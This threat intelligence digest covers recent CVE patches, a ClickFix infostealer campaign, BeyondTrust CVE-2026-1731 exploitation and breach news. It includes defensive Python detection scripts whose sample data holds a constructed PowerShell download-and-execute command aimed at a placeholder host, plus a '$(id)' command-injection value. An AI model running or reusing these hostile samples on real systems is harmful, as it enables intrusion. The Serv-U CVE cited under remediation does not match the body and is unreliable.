Executive Summary - Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Motex Patches CVE-2026-25785 in LANSCOPE Endpoint Manager - On 25 February 2026, Motex issued a patch for CVE-2026-25785, a critical path traversal vulnerability affecting LANSCOPE Endpoint Manager On-Premise Edition in versions prior to 9.4.8.0. If successfully exploited, the flaw could allow threat actors to execute arbitrary code on affected systems, potentially leading to full system compromise.
The vulnerability has been addressed in version 9.4.8.0. At the time of writing, there have been no reports indicating that the issue has been actively exploited.
VMware Aria Operations Patches Three High-Severity Vulnerabilities (CVE-2026-22719, CVE-2026-22720, CVE-2026-22721) - On 24 February 2026, VMware (Broadcom) released patches for three high-severity vulnerabilities — CVE-2026-22719, CVE-2026-22720 and CVE-2026-22721 — affecting VMware Aria Operations. These vulnerabilities also impact VMware Cloud Foundation, VMware vSphere Foundation, VMware Telco Cloud Platform and VMware Telco Cloud Infrastructure, as these platforms incorporate and depend upon VMware Aria Operations.
To address the issues, VMware released VMware Cloud Foundation Operations 9.0.2.0 and VMware Aria Operations 8.18.6, together with update packages KB92148 and KB428241 for VMware Cloud Foundation, VMware Telco Cloud Platform and VMware Telco Cloud Infrastructure. At the time of writing, there have been no reports of active exploitation.
SolarWinds Patches Four Critical Serv-U Vulnerabilities CVE-2025-40538, CVE-2025-40539, CVE-2025-40540, and CVE-2025-40541 - On 24 February 2026, SolarWinds released version 15.5.4 of Serv-U, its managed file transfer (MFT) and FTP server solution, to address four critical vulnerabilities. At the time of writing, there were no reports of these issues being exploited in the wild. The flaws affect SolarWinds Serv-U and, if left unpatched, could result in serious system compromise.
CVE-2025-40538 is a broken access control vulnerability that could allow a threat actor to create a system administrator account and execute arbitrary code as root by leveraging domain administrator or group administrator privileges. CVE-2025-40539 and CVE-2025-40540 are critical type confusion vulnerabilities, both of which could enable the execution of arbitrary native code with root privileges. CVE-2025-40541 is a critical insecure direct object reference (IDOR) vulnerability that could allow a threat actor to execute native code as root.
Potential Threats
Threat Actors Use ClickFix-Style Fake Captcha Lures to Deliver Information-Stealing Malware - On 18 February 2026, CyberProof reported a Fake Captcha campaign deploying an unnamed information-stealing malware. The malware targeted browser credentials, machine information, gaming apps like Steam, cryptocurrency wallets, VPN settings, and FTP credentials. Analysts first detected the activity on 23 January 2026 after noticing suspicious clipboard access and unusual PowerShell execution on an endpoint. The campaign used compromised websites showing ClickFix-style captcha prompts, suggesting opportunistic targeting.
The attack began when users copied and executed a malicious PowerShell command from the fake captcha pages. This downloaded staged payloads, including a file named cptch.bin containing Donut-generated shellcode for in-memory execution. The malware then collected and exfiltrated data, injected code into legitimate processes such as svchost.exe to avoid detection, and deployed an additional payload, cptchbuild.bin, to bypass hash-based checks. It also modified the RunMRU registry key to maintain persistence across system reboots.
Threat Actors Exploit BeyondTrust Remote Support Vulnerability (CVE-2026-1731) to Deploy Web Shells, SparkRAT, and VShell - On 19 February 2026, Palo Alto Networks’ Unit 42 reported active exploitation of CVE-2026-1731, a critical pre-authentication remote code execution flaw in the “thin-scc-wrapper” Bash component of BeyondTrust Remote Support and Privileged Remote Access. Exploitation begins via a crafted WebSocket request with a malicious “remoteVersion” parameter that triggers Bash command substitution, allowing threat actors to execute arbitrary shell commands as the website user.
After gaining access, attackers perform reconnaissance, temporarily modify the primary administrator’s password hash, and deploy web shells for persistence. They manipulate Apache settings in memory, retrieve additional payloads, establish command-and-control with SparkRAT and VShell, and deploy tunnelling and monitoring tools for lateral movement. Finally, they exfiltrate configuration files, application data, and database dumps to attacker-controlled infrastructure.
KongTuke Deploys “Promise Bomb” Chrome Extensions to Crash Browsers and Trigger CrashFix Malware Delivery - On 22 February 2026, Annex Security reported new variants of the CrashFix campaign using a “Promise Bomb” technique in malicious Google Chrome extensions to intentionally crash browsers and prompt users to execute malware. The Promise Bomb DoS method overwhelms Chrome by creating millions of unresolved promises, causing the browser to crash. The campaign, attributed to the threat actor KongTuke, uses seemingly legitimate security-themed extensions such as “Pixel Shield – Block Ads” and “PageGuard – Phishing Protection” to deliver the payload. Pixel Shield, for example, clones uBlock Origin Lite but embeds code to trigger crashes and malware delivery.
Threat actors distribute these extensions via the Chrome Web Store under low-trust accounts, cloning legitimate projects to appear functional and gain positive ratings. Installed extensions register for Web Push notifications from attacker-controlled domains and establish push-based command-and-control, allowing remote activation. When triggered, the extensions execute a Promise Bomb—Pixel Shield generates 10 million promises and PageGuard 100 million—crashing Chrome. After the crash, a pop-up delivers a fake “CrashFix” message directing victims to copy and run a command that abuses a legitimate Windows binary to launch PowerShell, download further payloads, and execute malware.
General News
Reddit fined $20 million by UK for not effectively checking users’ ages - The U.K.’s data protection regulator has fined Reddit £14.47 million for failing to properly verify the age of children using the platform. The Information Commissioner’s Office (ICO) found that Reddit lacked adequate age assurance measures, meaning it collected and processed children’s data illegally. While Reddit introduced stronger checks for accessing mature content in July 2025, it continued to rely on users self-declaring their age when opening accounts—a method the ICO said is “easy to bypass” and insufficient to protect children under 13.
The ICO also noted that Reddit failed to conduct a data protection impact assessment before January 2025 to address risks to children, despite the platform being widely used by minors. The regulator said these shortcomings meant children’s data was processed unlawfully, potentially exposing them to harmful content. Reddit has argued that requiring additional personal information would conflict with its commitment to user privacy and safety and intends to appeal the fine. John Edwards, the U.K. information commissioner, emphasised that the ruling should serve as a warning to other companies relying on self-declaration for age verification, as it does not adequately protect children online.
Russian-speaking hackers used gen AI tools to compromise 600 firewalls - Earlier this year, a Russian-speaking threat actor used commercial generative AI tools to compromise over 600 Fortinet FortiGate firewalls across more than 55 countries, researchers have found. Running from mid-January to mid-February, the campaign exploited weak configurations rather than novel vulnerabilities, allowing a “low-to-medium-skilled” actor to operate at a scale normally seen with larger, more advanced groups. The attackers used AI services to generate attack plans, automate scripts, and manage operations, targeting exposed administrative access points and weak authentication on FortiGate devices.
Once inside, the group stole full device configurations, including passwords and network details, enabling deeper access to internal systems such as Active Directory and backup environments—potentially laying the groundwork for future ransomware attacks. Researchers noted that AI-generated tools automated most steps of the campaign but often failed against patched systems or basic defensive controls. The campaign appeared financially motivated and opportunistic, with no known links to state-backed groups. Experts warned that AI-augmented cyberattacks are likely to increase, as both skilled and unskilled actors leverage AI to enhance malware, automation, and reconnaissance.
PayPal discloses data breach that exposed user info for 6 months - PayPal has notified customers of a data exposure in its PayPal Working Capital (PPWC) loan application that lasted nearly six months last year. Due to a software error discovered on 12 December 2025, a small number of customers had their names, email addresses, phone numbers, business addresses, Social Security numbers, and dates of birth exposed between 1 July and 13 December 2025. The company reversed the code change responsible for the error the day after discovering the issue and has reset passwords for all affected accounts.
A limited number of unauthorised transactions were reported, and refunds have been issued. PayPal is offering two years of free three-bureau credit monitoring and identity restoration services through Equifax, with enrolment required by 30 June 2026. Customers are advised to monitor credit reports and account activity for suspicious transactions. PayPal emphasised that it never requests passwords or authentication codes via phone, text, or email. The company said that roughly 100 customers were impacted and clarified that its systems were not breached, with the incident arising from the software error rather than an external attack.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
Severity legend: ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

| Threat Actor | Severity (before → after) | Opportunity (before → after) | Intent (before → after) |
|---|---|---|---|
| ShinyHunters | ● Basic → ● Moderate | 49 → 49 | 35 → 54 |
| Dragon Force Group | ● Moderate → ● Moderate | 68 → 65 | 49 → 49 |
| Asian_Baddie | NEW → ● Basic | NEW → 30 | NEW → 31 |
| BR-UNC-030 | NEW → ● Basic | NEW → 35 | NEW → 25 |
| PYROXENE | NEW → ● Basic | NEW → 30 | NEW → 30 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲ Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲ Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets |
|---|---|---|---|
| Lazarus Group ▲ | Disinformation ▲ | CVE-2025-49113 ▲ | Lawrence Wong ▲ |
| ShinyHunters ▲ | EVEREST Ransomware ▲ | CVE-2026-25108 ▲ | Singapore Government ▲ |
| Handala Hack Team ▲ | Vishing ▲ | CVE-2025-68461 ▲ | Wynn Resorts ▲ |
| UnsolicitedBooker ▲ | MarsSnake ▲ | CVE-2026-1731 ▲ | Conduent ▲ |
| KongTuke ▲ | Information Leakage ▲ | CVE-2018-0802 ▲ | Fortinet ▲ |
Prominent Information Security Events
Threat Actors Use ClickFix-Style Fake Captcha Lures to Deliver Information-Stealing Malware
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - f50846dcf09e0c7ce582040fb128ebf3
IOC: URL - 94[.]154[.]35[.]115
On 18 February 2026, CyberProof reported a Fake Captcha campaign in which threat actors deployed an unnamed information-stealing malware. The malware targeted browser credentials, system information, data from gaming applications like Steam, cryptocurrency wallets, VPN configurations, and FTP credentials. The campaign used compromised websites displaying ClickFix-style captcha prompts, suggesting opportunistic targeting. Analysts first identified the activity on 23 January 2026 after observing unusual clipboard access and abnormal PowerShell execution on an endpoint.
The attackers began by compromising legitimate websites and embedding fake captcha pages. When users visited these sites, they were instructed to copy and execute a PowerShell command through the Windows command line. This command then downloaded staged payloads from external servers and retrieved a file named cptch.bin, which contained shellcode generated with Donut, an open-source offensive security tool, enabling the malware to run directly in memory.
Once deployed, the malware carried out reconnaissance and exfiltrated sensitive data. It injected its code into legitimate processes such as svchost.exe to avoid detection and deployed an additional payload, cptchbuild.bin, to bypass hash-based security checks. To maintain persistence across system reboots, the malware modified the RunMRU registry key to ensure PowerShell execution at startup.
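The two behaviours the report singles out as the earliest observable signals, PowerShell launched from the Run dialog after a clipboard paste and the RunMRU key being touched, can both be checked from endpoint telemetry. The following is an added example written for this digest (it is not code from CyberProof's report or from the campaign itself): it scores Sysmon-style process-creation events for the traits of a pasted ClickFix command and reviews Run-dialog history (RunMRU) values for scripting hosts with suspicious switches. All events and registry values are constructed, and the payload host name is a placeholder.

```python
import re

# Added example, not from the CyberProof report or this digest. Sample events and
# registry values below are constructed; "payload.example.invalid" is a placeholder host.

# Command-line traits of a pasted ClickFix command: hidden window, encoded command,
# download-and-execute cmdlets, inline evaluation, execution-policy bypass.
SUSPICIOUS_TOKENS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download": re.compile(
        r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|curl)\b", re.I),
    "inline_exec": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
}

# Constructed Sysmon-style process-creation events: parent image, image, command line.
SAMPLE_EVENTS = [
    {   # the lure: PowerShell started from the Run dialog (parent explorer.exe) to fetch the stager
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr http://payload.example.invalid/cptch.bin -UseBasicParsing)"',
    },
    {   # an administrator opening an interactive console from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell",
    },
    {   # a maintenance script started under cmd.exe, not from the Run dialog
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # unrelated process
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": "notepad.exe",
    },
]

# Constructed values under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# each entry is the command typed into the Run dialog followed by "\1"; MRUList orders them.
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "calc\\1",
    "b": 'powershell -w hidden -c "iex (iwr http://payload.example.invalid/cptch.bin)"\\1',
}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return the indicator names matched by one process-creation event."""
    if _basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    hits = [name for name, rx in SUSPICIOUS_TOKENS.items() if rx.search(event["cmdline"])]
    if _basename(event["parent"]) == "explorer.exe":
        hits.append("launched_from_run_dialog")
    return hits


def is_clickfix_candidate(event):
    """Explorer/Run-dialog parent plus at least one download, execution or evasion
    trait; a bare 'powershell' typed by an administrator is not enough."""
    hits = classify_event(event)
    return "launched_from_run_dialog" in hits and len(hits) >= 2


def scan_runmru(values):
    """Return (entry, command) pairs, most recent first, where Run-dialog history shows
    a scripting host invoked with suspicious switches."""
    flagged = []
    for name in values.get("MRUList", ""):
        command = values.get(name, "")
        if command.endswith("\\1"):
            command = command[:-2]
        host = re.match(r"\s*(?:\S*\\)?(?:powershell|pwsh|cmd|mshta|wscript)(?:\.exe)?\b", command, re.I)
        if host and any(rx.search(command) for rx in SUSPICIOUS_TOKENS.values()):
            flagged.append((name, command))
    return flagged


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix_candidate(ev), classify_event(ev))
    print(scan_runmru(SAMPLE_RUNMRU))
```

Requiring the Explorer parent together with a second trait keeps interactive console launches by administrators out of the alert queue; in production the same scoring would be applied to real process-creation and registry-value-set telemetry rather than the constructed samples.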
Threat Actors Exploit BeyondTrust Remote Support Vulnerability (CVE-2026-1731) to Deploy Web Shells, SparkRAT, and VShell
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - 9f431d5549a03aee92cfd2bdbbe90f1c91e965c99e90a0c9ad5a001f4e80c350
IOC: IP - 45[.]61[.]150[.]96
On 19 February 2026, Palo Alto Networks’ Unit 42 published a technical analysis detailing the active exploitation of CVE-2026-1731, a critical pre-authentication remote code execution vulnerability affecting the “thin-scc-wrapper” Bash component in BeyondTrust Remote Support and Privileged Remote Access. The flaw allows unauthenticated threat actors to execute operating system commands as the website user, potentially leading to full system compromise. Exploitation begins with a crafted WebSocket request containing a malicious “remoteVersion” parameter designed to trigger Bash command substitution and arbitrary shell execution.
After achieving code execution, the attackers conduct reconnaissance to gather host and domain information, then temporarily overwrite the primary administrator’s password hash using a custom Python script to gain elevated access. They deploy multiple web shells for persistence, including simple PHP backdoors and more advanced variants, and manipulate Apache configuration settings in memory to retain control while minimising forensic traces. Additional payloads are retrieved and executed to expand access and establish longer-term footholds.
The threat actors then deploy remote access tools including SparkRAT and VShell to establish command-and-control and maintain persistence, while also attempting reverse shell connections. They use tunnelling and monitoring tools to enable lateral movement within compromised environments and employ DNS-based techniques to validate exploitation and fingerprint hosts. Finally, they stage configuration files, internal application data, and PostgreSQL database dumps for compression and exfiltration to attacker-controlled infrastructure.
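Because the flaw is triggered by a single request parameter reaching Bash command substitution, the cheapest retrospective check is to review access logs for the remoteVersion value and compare it against what a version string should look like. The following is an added example written for this digest, not code from Unit 42 or from BeyondTrust: it parses constructed access-log lines, extracts and decodes remoteVersion, applies an allow-list (the same check a wrapper should enforce before any substitution) and a shell-metacharacter check, and also flags requests from the IP listed in the IOCs above. The endpoint path /ws is a placeholder, and it is an assumption that the parameter appears in the logged request line of the WebSocket upgrade request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Added example, not from the Unit 42 report or this digest. Assumptions: the remoteVersion
# parameter is visible in the logged request line, "/ws" is a placeholder path, and every
# log line below is constructed.

# Allow-list: what a legitimate client version string is expected to look like.
VERSION_OK = re.compile(r"^\d+(?:\.\d+){0,3}$")
# Characters that drive Bash command substitution, expansion, separators or redirection
# and have no place in a version string.
SHELL_META = re.compile(r"[$`;&|<>(){}\n]")
# Source IP from the digest's IOC list for this event.
KNOWN_IOC_IPS = {"45.61.150.96"}

# Apache combined log format.
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
203.0.113.10 - - [19/Feb/2026:09:58:41 +0000] "GET /ws?remoteVersion=24.1.2 HTTP/1.1" 101 0 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Feb/2026:10:02:13 +0000] "GET /ws?remoteVersion=1.0%24%28id%29 HTTP/1.1" 101 0 "-" "python-requests/2.31.0"
198.51.100.8 - - [19/Feb/2026:10:03:55 +0000] "GET /ws?remoteVersion=v24-beta HTTP/1.1" 400 0 "-" "curl/8.4.0"
203.0.113.11 - - [19/Feb/2026:10:04:20 +0000] "GET /login HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
45.61.150.96 - - [19/Feb/2026:10:07:02 +0000] "GET /ws?remoteVersion=24.1.2 HTTP/1.1" 101 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RX.match(line)
    return m.groupdict() if m else None


def remote_version(target):
    """Percent-decoded remoteVersion value from the request target, or None when absent."""
    values = parse_qs(urlsplit(target).query).get("remoteVersion")
    return values[0] if values else None


def assess_remote_version(value):
    """'ok' for an allow-listed version string, otherwise the reason it fails."""
    if SHELL_META.search(value):
        return "shell-metacharacters"
    if not VERSION_OK.match(value):
        return "malformed"
    return "ok"


def find_suspicious(log_text):
    """Findings for every request carrying a remoteVersion that fails validation
    or that comes from a known IOC address."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        value = remote_version(rec["target"])
        if value is None:
            continue
        verdict = assess_remote_version(value)
        if verdict == "ok" and rec["ip"] in KNOWN_IOC_IPS:
            verdict = "known-ioc-source"
        if verdict != "ok":
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "remoteVersion": value, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f)
```

The ordering matters: a value is checked for shell metacharacters before the allow-list so that the finding names the more serious condition, and a well-formed version from a listed IOC address is still surfaced, since a successful exploitation attempt need not leave a malformed parameter in the log if the attacker's follow-on traffic is what was captured.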
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2026-25785 (LANSCOPE Endpoint Manager) – This vulnerability can be addressed by upgrading to version 9.4.8.0.
- CVE-2026-22719, CVE-2026-22720, CVE-2026-22721 (VMware Aria) – These vulnerabilities can be addressed by updating to VMware Cloud Foundation Operations 9.0.2.0 and VMware Aria Operations 8.18.6.
- CVE-2026-2447 (SolarWinds Serv-U) – These vulnerabilities can be addressed by updating SolarWinds Serv-U to version 15.5.4.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.